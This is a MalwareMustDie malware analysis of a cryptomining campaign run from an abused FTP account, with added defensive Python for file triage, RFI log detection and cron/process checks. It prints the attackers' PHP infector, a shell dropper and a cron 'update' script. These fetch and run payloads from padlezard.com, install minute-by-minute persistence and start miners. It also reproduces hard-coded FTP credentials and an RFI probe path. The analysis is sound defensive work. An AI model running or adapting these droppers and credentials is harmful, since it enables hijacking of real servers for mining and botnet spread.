// MalwareMustDie - Case #8
// Report base: Journey to hacked FTP sites, URLs:
// http://blog.malwaremustdie.org/2014/05/a-journey-to-abused-ftp-sites-story-of.html
// http://blog.malwaremustdie.org/2014/06/a-journey-to-abused-ftp-sites-story-of.html
// Samples: http://www.mediafire.com/download/agkazxpg4ie3eqg/Case8-PErl-miners.7z
// Directory listing of the abused FTP account (credentials exactly as hard-coded in the dropper):
$ curl "ftp://padlezardftp:123456@84.246.227.121/httpdocs/"
-rwxr-xr-x 1 root root 872 May 20 00:55 a
-rw-r--r-- 1 root root 1008 May 20 00:56 bot
-rw-r--r-- 1 padlezardftp psacln 15138 Apr 16 12:33 botphp
-rwxr-xr-x 1 root root 283 May 2 04:25 c
-rwxr-xr-x 1 root root 379680 Dec 3 2013 clamav
-rw-r--r-- 1 padlezardftp psacln 753161 Feb 27 07:19 iexplorer.exe
-rw-r--r-- 1 padlezardftp psacln 671836 Mar 19 10:35 init.exe
-rwxr-xr-x 1 root root 15700 Mar 12 05:33 lol
-rw-r--r-- 1 padlezardftp psacln 751993 Apr 24 12:26 ovi.exe
-rw-r--r-- 1 root root 26585 Jun 1 19:56 php
-rw-r--r-- 1 root root 15713 Apr 30 01:34 plm
-rw-r--r-- 1 root root 26548 Jun 1 10:16 s0nia
-rwxr-xr-x 1 root root 518288 Dec 3 2013 sh
-rwxr-xr-x 1 root root 283 May 2 04:25 update
-rwxr-xr-x 1 root root 319292 Sep 30 2013 upx
// Note the two owners: the .exe files and botphp belong to the FTP user (padlezardftp:psacln),
// i.e. they came in over FTP, while the miners and scripts are root-owned, which suggests
// they were written by something running as root on the server itself.
// Check ELF (myrfile is apparently the author's helper that fetches each remote file and runs file(1) on it):
$ myrfile "ftp://padlezardftp:123456@84.246.227.121/httpdocs/*" | grep ELF
clamav: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x11473c67e3bd026f1c3ce7458b836b15498365c4, stripped
sh: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xb7880c540a3530b2831b1618512b5f90269151b8, stripped
upx: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
$
// Check PE:
$ myrfile "ftp://padlezardftp:123456@84.246.227.121/httpdocs/*" | grep PE
iexplorer.exe: PE32 executable (GUI) Intel 80386, for MS Windows
init.exe: PE32 executable (GUI) Intel 80386, for MS Windows
ovi.exe: PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
$
// Check PHP:
$ myrfile "ftp://padlezardftp:123456@84.246.227.121/httpdocs/*" | grep PHP
bot: PHP script, ASCII text
$
// Check Perl scripts:
$ myrfile "ftp://padlezardftp:123456@84.246.227.121/httpdocs/*" | grep Perl
lol: Perl script, ASCII text executable
plm: Perl script, ASCII text executable
$
// Check other formats:
$ myrfile "ftp://padlezardftp:123456@84.246.227.121/httpdocs/*" | grep -v 'ELF\|PE\|PHP\|Perl'
a: POSIX shell script, ASCII text executable
botphp: C++ source, ASCII text
c: POSIX shell script, ASCII text executable
php: data
s0nia: data
update: POSIX shell script, ASCII text executable
$
// The ELFs:
// upx - the genuine UPX packer binary, not malware by itself:
.rodata:0x080C6680 0x0042 unsigned int upx_adler32(const void*, unsigned int, unsigned int)
.rodata:0x080C66E0 0x00A5 int upx_compress(const unsigned char*, unsigned int, unsigned char*, unsigned int*, upx_callback_t*, int, int, const upx_compress_config_t*, upx_compress_result_t*)
.rodata:0x080C67A0 0x0079 int upx_decompress(const unsigned char*, unsigned int, unsigned char*, unsigned int*, int, const upx_compress_result_t*)
.rodata:0x080C6820 0x008F int upx_test_overlap(const unsigned char*, const unsigned char*, unsigned int, unsigned int, unsigned int*, int, const upx_compress_result_t*)
.rodata:0x080C9371 0x00AA Ultimate Packer for eXecutables\n Copyright (C) 1996 - %s\nUPX %-10s Markus Oberhumer, Laszlo Molnar & John Reiser %14s\n\n
.rodata:0x080C941B 0x0039 Usage: %s [-123456789dlthVL] [-qvfk] [-o file] %sfile..\n
.rodata:0x080C947B 0x000C \nCommands:\n
.rodata:0x080C9491 0x0034 --best compress best (can be slow for big files)\n
// clamav - is not ClamAV at all but "minerd" (cpuminer), a 32-bit CPU coin-mining ELF (scrypt/sha256d, stratum):
.rodata:0x08096848 0x002B Try `minerd --help' for more information.\n
.rodata:0x08096874 0x06A9 Usage: minerd [OPTIONS]\nOptions:\n -a, --algo=ALGO specify the algorithm to use\n scrypt scrypt(1024, 1, 1) (default)\n sha256d SHA-256d\n -o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)\n -O, --userpass=U:P username:password pair for mining server\n -u, --user=USERNAME username for mining server\n -p, --pass=PASSWORD password for mining server\n --cert=FILE certificate for mining server using SSL\n -x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy\n -t, --threads=N number of miner threads (default: number of processors)\n -r, --retries=N number of times to retry if a network call fails\n (default: retry indefinitely)\n -R, --retry-pause=N time to pause between retries, in seconds (default: 0)\n -T, --timeout=N network timeout, in seconds (default: 270)\n -s, --scantime=N upper bound on time spent s
.rodata:0x08096F20 0x002A accepted: %lu/%lu (%.2f%%), %s khash/s %s
.rodata:0x08096F4C 0x002D DEBUG: job_id="%s" extranonce2=%s ntime=%08x
.rodata:0x08096F7C 0x001F Stratum connection interrupted
.rodata:0x08096F9C 0x002E {\"method\": \"getwork\", \"params\": [], \"id\":0}\r\n
.rodata:0x08096FCC 0x0027 DEBUG: stale work detected, discarding
.rodata:0x08096FF4 0x004E {\"method\": \"mining.submit\", \"params\": [\"%s\", \"%s\", \"%s\", \"%s\", \"%s\"], \"id\":4}
.rodata:0x08097044 0x002E submit_upstream_work stratum_send_line failed
.rodata:0x08097074 0x0034 {\"method\": \"getwork\", \"params\": [ \"%s\" ], \"id\":1}\r\n
.rodata:0x080970A8 0x002A submit_upstream_work json_rpc_call failed
// sh - is also a "minerd" (the 64-bit build); below is a different, "better" way to dump the strings, one per line with their .rodata offsets:
.rodata:0x06C318 Usage: minerd [OPTIONS]
.rodata:0x06C330 Options:
.rodata:0x06C339 -a, --algo=ALGO specify the algorithm to use
.rodata:0x06C36E scrypt scrypt(1024, 1, 1) (default)
.rodata:0x06C3AF sha256d SHA-256d
.rodata:0x06C3DC -o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
.rodata:0x06C42B -O, --userpass=U:P username:password pair for mining server
.rodata:0x06C46C -u, --user=USERNAME username for mining server
.rodata:0x06C49F -p, --pass=PASSWORD password for mining server
.rodata:0x06C4D2 --cert=FILE certificate for mining server using SSL
.rodata:0x06C512 -x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
.rodata:0x06C552 -t, --threads=N number of miner threads (default: number of processors)
.rodata:0x06C5A2 -r, --retries=N number of times to retry if a network call fails
.rodata:0x06C5EB (default: retry indefinitely)
.rodata:0x06C623 -R, --retry-pause=N time to pause between retries, in seconds (default: 30)
.rodata:0x06C673 -T, --timeout=N network timeout, in seconds (default: 270)
.rodata:0x06C6B6 -s, --scantime=N upper bound on time spent scanning current work when
.rodata:0x06C703 long polling is unavailable, in seconds (default: 5)
.rodata:0x06C752 --no-longpoll disable X-Long-Polling support
.rodata:0x06C789 --no-stratum disable X-Stratum support
.rodata:0x06C7BB -q, --quiet disable per-thread hashmeter output
.rodata:0x06C7F7 -D, --debug enable debug output
.rodata:0x06C823 -P, --protocol-dump verbose dump of protocol-level activities
.rodata:0x06C865 -S, --syslog use system log for output messages
.rodata:0x06C8A0 -B, --background run the miner in the background
.rodata:0x06C8D8 --benchmark run in offline benchmark mode
.rodata:0x06C90E -c, --config=FILE load a JSON-format configuration file
.rodata:0x06C94C -V, --version display version information and exit
.rodata:0x06C989 -h, --help display this help text and exit
.rodata:0x06C9C8 accepted: %lu/%lu (%.2f%%), %s khash/s %s
.rodata:0x06C9F8 DEBUG: job_id="%s" extranonce2=%s ntime=%08x
.rodata:0x06CA28 Stratum connection interrupted
.rodata:0x06CA48 {"method": "getwork", "params": [], "id":0}
.rodata:0x06CA78 DEBUG: stale work detected, discarding
.rodata:0x06CAA0 {"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
.rodata:0x06CAF0 submit_upstream_work stratum_send_line failed
.rodata:0x06CB20 {"method": "getwork", "params": [ "%s" ], "id":1}
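The two triage steps above (file(1) over the listing, then a .rodata string dump of the ELFs) as one added Python example. This is not code from the page or from MalwareMustDie: it classifies a blob by its leading bytes, walks the ELF section header table to pull printable runs out of .rodata with their virtual addresses (stripping a binary removes symbols, not section headers, so this still works on the stripped samples), and flags the cpuminer/stratum markers seen in the dumps. The ELF it runs on when given no argument is a minimal ELF64 constructed in the script, not one of the case's samples; the marker list and the little-endian-only assumption are mine.

```python
"""Triage helpers: magic-byte classification plus .rodata string dump with miner markers.
Added example (not the page's or MalwareMustDie's code); the ELF it runs on is constructed here."""
import re
import struct
import sys

# Strings that identify a cpuminer/minerd build or stratum traffic (assumed indicator list).
MINER_MARKERS = ("minerd", "stratum", "getwork", "mining.submit", "khash/s", "scrypt", "sha256d")


def classify(data: bytes) -> str:
    """Coarse file-type triage by leading bytes, mirroring what file(1) reported above."""
    if data.startswith(b"\x7fELF"):
        return "ELF " + {b"\x01": "32-bit", b"\x02": "64-bit"}.get(data[4:5], "unknown-class")
    if data[:2] == b"MZ" and len(data) >= 0x40:
        pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
        return "PE" if data[pe_off:pe_off + 4] == b"PE\0\0" else "MZ (DOS/unknown)"
    if data.startswith(b"#!"):
        interp = data.split(b"\n", 1)[0].decode("ascii", "replace")
        if "perl" in interp:
            return "Perl script"
        if "sh" in interp:
            return "POSIX shell script"
        return "script (" + interp + ")"
    if b"<?php" in data[:64]:
        return "PHP script"
    return "data"


def rodata_strings(data: bytes, min_len: int = 4):
    """Yield (virtual address, string) for printable runs in the ELF's .rodata section.
    Little-endian only, which covers both LSB samples above."""
    if data[4:5] == b"\x02":                                      # ELF64 header layout
        e_shoff = struct.unpack_from("<Q", data, 0x28)[0]
        e_shentsize, e_shnum, e_shstrndx = struct.unpack_from("<HHH", data, 0x3A)
        fmt = "<IIQQQQIIQQ"                                       # Elf64_Shdr
    else:                                                         # ELF32 header layout
        e_shoff = struct.unpack_from("<I", data, 0x20)[0]
        e_shentsize, e_shnum, e_shstrndx = struct.unpack_from("<HHH", data, 0x2E)
        fmt = "<IIIIIIIIII"                                       # Elf32_Shdr
    shdrs = [struct.unpack_from(fmt, data, e_shoff + i * e_shentsize) for i in range(e_shnum)]
    names_off = shdrs[e_shstrndx][4]                              # sh_offset of .shstrtab
    for sh in shdrs:                                              # sh = (name, type, flags, addr, offset, size, ...)
        name_end = data.index(b"\0", names_off + sh[0])
        if data[names_off + sh[0]:name_end] != b".rodata":
            continue
        sh_addr, sh_offset, sh_size = sh[3], sh[4], sh[5]
        blob = data[sh_offset:sh_offset + sh_size]
        for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob):
            yield sh_addr + m.start(), m.group().decode("ascii")


def miner_indicators(strings):
    """Keep only the extracted strings that carry a cpuminer/stratum marker."""
    return [(addr, s) for addr, s in strings if any(k in s.lower() for k in MINER_MARKERS)]


# Constructed .rodata content for the demo ELF (not taken from the samples).
DEMO_RODATA = b'Usage: minerd [OPTIONS]\0stratum+tcp://\0{"method": "mining.submit"}\0ab\0hello world\0'


def build_demo_elf64(rodata: bytes) -> bytes:
    """Build a minimal little-endian ELF64 holding only a .rodata and a .shstrtab section."""
    shstrtab = b"\0.rodata\0.shstrtab\0"                         # name indices: 1 and 9
    rodata_off = 64                                               # right after the ELF header
    shstr_off = rodata_off + len(rodata)
    shoff = shstr_off + len(shstrtab)
    shoff += (-shoff) % 8                                         # align the section header table
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8       # ELF64, LSB, version 1
    ehdr = e_ident + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0, 0, shoff, 0, 64, 0, 0, 64, 3, 2)

    def shdr(name, typ, flags, addr, off, size):
        return struct.pack("<IIQQQQIIQQ", name, typ, flags, addr, off, size, 0, 0, 1, 0)

    shdrs = shdr(0, 0, 0, 0, 0, 0)                                # SHT_NULL
    shdrs += shdr(1, 1, 0x2, 0x400000 + rodata_off, rodata_off, len(rodata))   # .rodata, PROGBITS|ALLOC
    shdrs += shdr(9, 3, 0, 0, shstr_off, len(shstrtab))           # .shstrtab, STRTAB
    body = ehdr + rodata + shstrtab
    return body + b"\0" * (shoff - len(body)) + shdrs


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_demo_elf64(DEMO_RODATA)
    print(classify(blob))
    for addr, s in miner_indicators(list(rodata_strings(blob))):
        print(".rodata:0x%08X %s" % (addr, s))
```

Run it as `python3 triage.py clamav` against a downloaded sample to get the same `.rodata:0xADDR string` lines as the dumps above, filtered to the miner markers.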
// The PEs are coin miners as well (VirusTotal reports for the three .exe files):
https://www.virustotal.com/en/file/a343e06a05b863730ec07bbe02c8f3989669afd588603ecca64a73f2db6ed777/analysis/1397692298/
https://www.virustotal.com/en/file/2c5146d815d387fd214a9fbdf5e95885f31512744be4b74b57cac8958e062d07/analysis/1400526645/
https://www.virustotal.com/en/file/eb952920fb9104de08f661a47d76dc7ad5806fc90b2f3a1579da288bdc08066f/analysis/1401094548/
// THE PHP ("bot", 1008 bytes) is the infector run on OTHER hosts: it pulls init.exe (Windows)
// or "a" (Linux) from this same FTP account with the hard-coded credentials and executes it:
<?php
// drop locations on the victim and source paths on the abused FTP server
$win_local_file = "c:\windows\init.exe";
$lin_local_file = "/tmp/a";
$win_server_file = "/httpdocs/init.exe";
$lin_server_file = "/httpdocs/a";
$ftp_server = "84.246.227.121";
$ftp_user_name = "padlezardftp";
$ftp_user_pass = "123456";
// attacker's quirk, kept as found: /tmp/a is run BEFORE it is downloaded, so on a fresh
// Linux host this only pays off from the second run onwards
$result = exec("sh /tmp/a");
echo php_uname();
echo PHP_OS;
if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") {
    $conn_id = ftp_connect($ftp_server);
    $login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
    if (ftp_get($conn_id, $win_local_file, $win_server_file, FTP_BINARY)) {
        echo "Successfully written to $local_file\n"; // $local_file is undefined in the original, kept as found
        echo exec("c:\windows\init.exe &del c:\windows\init.exe"); // run the miner, then remove the dropped file
    } else {
        echo "There was a problem\n";
    }
    ftp_close($conn_id);
} else {
    $conn_id = ftp_connect($ftp_server);
    $login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
    if (ftp_get($conn_id, $lin_local_file, $lin_server_file, FTP_BINARY)) {
        echo "$result";
    } else {
        echo "There was a problem\n";
    }
    ftp_close($conn_id);
}
?>
// THE PERLs...
The files "lol" and "plm" contain the same code:
an IRC Perl bot used to spread the infection for these miners.
It has web-app vulnerability scanning, standard TCP and UDP flooding and
a basic HTTP DoS flood function, and is controlled over IRC or via shell.
The code is here: http://pastebin.com/VQVzw7f9
This Perl bot hunts for the RFI below. Once it finds a vulnerable host it exploits it,
then uses the PHP script above to download the payloads onto the newly infected host.
The targeted vulnerability is hinted at by the bot's scan query:
query="/SQuery/lib/gore.php?libpath="
Reference: http://www.exploit-db.com/exploits/2003/
More ref: https://www.google.com/search?q=%2FSQuery%2Flib%2Fgore.php%3Flibpath%3D&ie=utf-8&oe=utf-8&client=ubuntu&channel=fs&gws_rd=ssl#channel=fs&nfpr=1&q=%2FSQuery%2Flib%2Fgore.php%3Flibpath%3D …
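What the bot's scan looks like from the victim's side, as an added Python example that is not from the page or from MalwareMustDie: it parses Apache/nginx combined-format access log lines and flags any request whose query parameter carries a remote URL (the generic RFI signature), marking the SQuery gore.php libpath probe above separately. The log lines are constructed for the demo, and the "likely_success" heuristic (a 200 on the probe) is my assumption, not a claim from the report.

```python
"""Spotting the RFI probe the Perl bot sends, in web-server access logs.
Added example (not the page's or MalwareMustDie's code); the log lines below are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# The exact path the bot's scan query above targets (SQuery gore.php libpath RFI).
KNOWN_RFI_PATH = "/SQuery/lib/gore.php"

# Constructed sample: one normal request, two SQuery probes (one URL-encoded), one other RFI attempt.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jun/2014:22:50:59 +0900] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Jun/2014:22:51:03 +0900] "GET /SQuery/lib/gore.php?libpath=http://evil.example/bot.txt? HTTP/1.1" 200 3012 "-" "libwww-perl/6.05"',
    '198.51.100.7 - - [04/Jun/2014:22:51:04 +0900] "GET /shop/SQuery/lib/gore.php?libpath=http%3A%2F%2Fevil.example%2Fbot.txt%3F HTTP/1.1" 404 210 "-" "libwww-perl/6.05"',
    '203.0.113.9 - - [04/Jun/2014:22:52:10 +0900] "GET /view.php?file=http://evil.example/shell.txt HTTP/1.1" 200 88 "-" "Mozilla/4.0"',
]


def rfi_params(target: str):
    """Return (param, value) pairs whose value is a remote URL: the generic RFI signature."""
    hits = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)                      # catch double-encoded values too
        if re.match(r"^(https?|ftp)://", value, re.I):
            hits.append((key, value))
    return hits


def scan_access_log(lines):
    """Yield one finding per request carrying a URL in a query parameter."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = rfi_params(m["target"])
        if not hits:
            continue
        path = urlsplit(m["target"]).path
        yield {
            "ip": m["ip"],
            "path": path,
            "params": hits,
            "status": int(m["status"]),
            "known_squery": path.endswith(KNOWN_RFI_PATH),
            # assumption: a 200 means the vulnerable script exists and may have included the URL;
            # a 404 means the probe hit nothing on this host
            "likely_success": m["status"] == "200",
        }


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Feed it `zcat access.log*.gz` line by line; a burst of `libpath=http://...` hits from one source with a libwww-perl user agent is exactly the footprint this bot leaves while scanning.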
// The way the attacker executed these files on a compromised host is well described
// in file "a" (comments added for this write-up):
#!/bin/sh
crontab -r                      # wipe the user's existing crontab
cd /tmp
rm -rf a* c* update*            # remove older copies of the dropper
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d   # persistence: re-run "update" every minute
crontab cron.d
crontab -l | grep update
wget http://padlezard.com/update >> /dev/null &&
curl -O http://padlezard.com/update >> /dev/null &&
chmod u+x update
#chattr -ia bash
#chattr -ia *
curl -O http://padlezard.com/clamav
curl -O http://padlezard.com/sh
wget http://padlezard.com/clamav
wget http://padlezard.com/sh
wget http://padlezard.com/plm
curl -O http://padlezard.com/plm
perl plm                        # start the IRC Perl bot (scanner/flooder), then delete it from disk
rm -rf plm*
chmod +x sh
chmod +x clamav
mv clamav bash                  # the 32-bit minerd now shows up as "bash" in ps
#kill -9 `ps x|grep miner|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep stratum|grep -v grep|awk '{print $1}'`   # kill competing miners
killall -9 kav m32 m64
./bash -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B   # both miners: pool, user:pass, background
./sh -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
#chattr +ia bash
#chattr +ia sh
// The "update" script (identical to "c": same 283 bytes, same timestamp) is what cron runs every
// minute on the compromised host: if no process is connected to the pool at 176.31.255.138:3333
// it fetches "a" again from padlezard.com and runs it, which reinstalls the miners and
// restarts the Perl bot scanner:
#!/bin/sh
# ps x prints PID TTY STAT TIME COMMAND, so $7 is the third word of the miner's
# command line, i.e. the stratum URL; empty means the miner is not running
plm=`ps x|grep 176.31.255.138:3333|grep -v grep|awk '{print $7}'`
if [ "$plm" != "" ]
then echo "MERGE!!!"
else
echo "Starting!!!"
wget http://padlezard.com/a && sh a >> /dev/null &
curl -O http://padlezard.com/a && sh a >> /dev/null &
fi
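The host-side indicators the two scripts leave behind, as an added Python example that is not from the page or from MalwareMustDie: one function flags crontab entries that run from a world-writable directory or fire every minute with their output hidden (what "a" installs), the other parses `ps axo pid,comm,args` output and flags anything that talks stratum, regardless of its process name, since the dropper renames minerd to "bash". The crontab and ps samples are constructed to match the scripts above; the thresholds are my choices.

```python
"""Host-side indicators of the "a"/"update" persistence: an every-minute cron job from /tmp
and minerd processes renamed to "bash"/"sh" talking stratum.
Added example (not the page's or MalwareMustDie's code); the crontab and ps samples are constructed."""
import re

TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
STRATUM_RE = re.compile(r"stratum\+tcp://(?P<host>[\w.\-]+):(?P<port>\d+)", re.I)
USERPASS_RE = re.compile(r"(?:-O|--userpass)[= ](\S+)")   # cpuminer's user:pass option

# Constructed sample crontab: one legitimate job and the dropper's entry.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * /tmp/update >/dev/null 2>&1
"""

# Constructed sample of `ps axo pid,comm,args`: the two renamed miners, a real shell, the Perl bot.
SAMPLE_PS = """\
  PID COMMAND         COMMAND
 1337 bash            ./bash -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
 1338 sh              ./sh -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
 2001 bash            -bash
 2100 perl            perl plm
"""


def suspicious_cron(crontab_text: str):
    """Flag entries that run from a world-writable directory, or that both fire every
    minute and hide their output: the pattern the dropper "a" installs."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)                # 5 schedule fields + the command
        if len(fields) < 6:
            continue
        schedule, command = " ".join(fields[:5]), fields[5]
        reasons = []
        if schedule == "* * * * *":
            reasons.append("every-minute schedule")
        if any(d in command for d in TMP_DIRS):
            reasons.append("runs from world-writable dir")
        if re.search(r">\s*/dev/null\s+2>&1", command):
            reasons.append("output hidden")
        if "runs from world-writable dir" in reasons or len(reasons) >= 2:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings


def miner_processes(ps_text: str):
    """Parse `ps axo pid,comm,args` output and flag anything talking stratum, whatever it is called."""
    findings = []
    for line in ps_text.splitlines()[1:]:           # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, comm, args = parts
        pool = STRATUM_RE.search(args)
        if not pool:
            continue
        userpass = USERPASS_RE.search(args)
        findings.append({
            "pid": int(pid),
            "comm": comm,
            "pool": pool["host"] + ":" + pool["port"],
            "userpass": userpass.group(1) if userpass else None,
            # after `mv clamav bash` the process name says nothing about what the binary is
            "looks_renamed": "miner" not in comm.lower(),
        })
    return findings


if __name__ == "__main__":
    for f in suspicious_cron(SAMPLE_CRONTAB):
        print("cron:", f)
    for f in miner_processes(SAMPLE_PS):
        print("proc:", f)
```

On a live box, pipe in `crontab -l -u <user>` (for every user, plus /etc/cron.d) and `ps axo pid,comm,args`; the pool host:port and the user:pass string are the pivot points for hunting the same operator elsewhere.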
// The CNC of this operation, i.e. the stratum pool both miners connect to and that "update"
// polls for, is 176.31.255.138:3333, hosted yet again at that well-known malware garbage can, OVH, France:
Req time: Wed Jun 4 22:50:59 JST 2014
IP: 176.31.255.138
Result: ns388807.ovh.net. | 16276 | 176.31.0.0/16 | OVH | FR | OVH.COM | OVH SAS
// There is another PHP pbot, "phpbot" (presumably the 15 KB "botphp" in the listing, which
// file(1) misreports as C++ source): it is the older pbot version, without the L7 HTTP DDoS functions.
// Two more Perl IRC bots ("PowerBot") are in the files "s0nia" and "php"
// (both reported as "data" by file(1), i.e. not plain text).
// Functions: wiping the server's important directories, UDP DoS, port scanner,
// file downloader, shell backdoor (back-connect), IRC attacks.
// The code of these Perl PowerBots is here:
http://pastebin.com/iJX3xaNF
-----
#MalwareMustDie!!!!!!!!!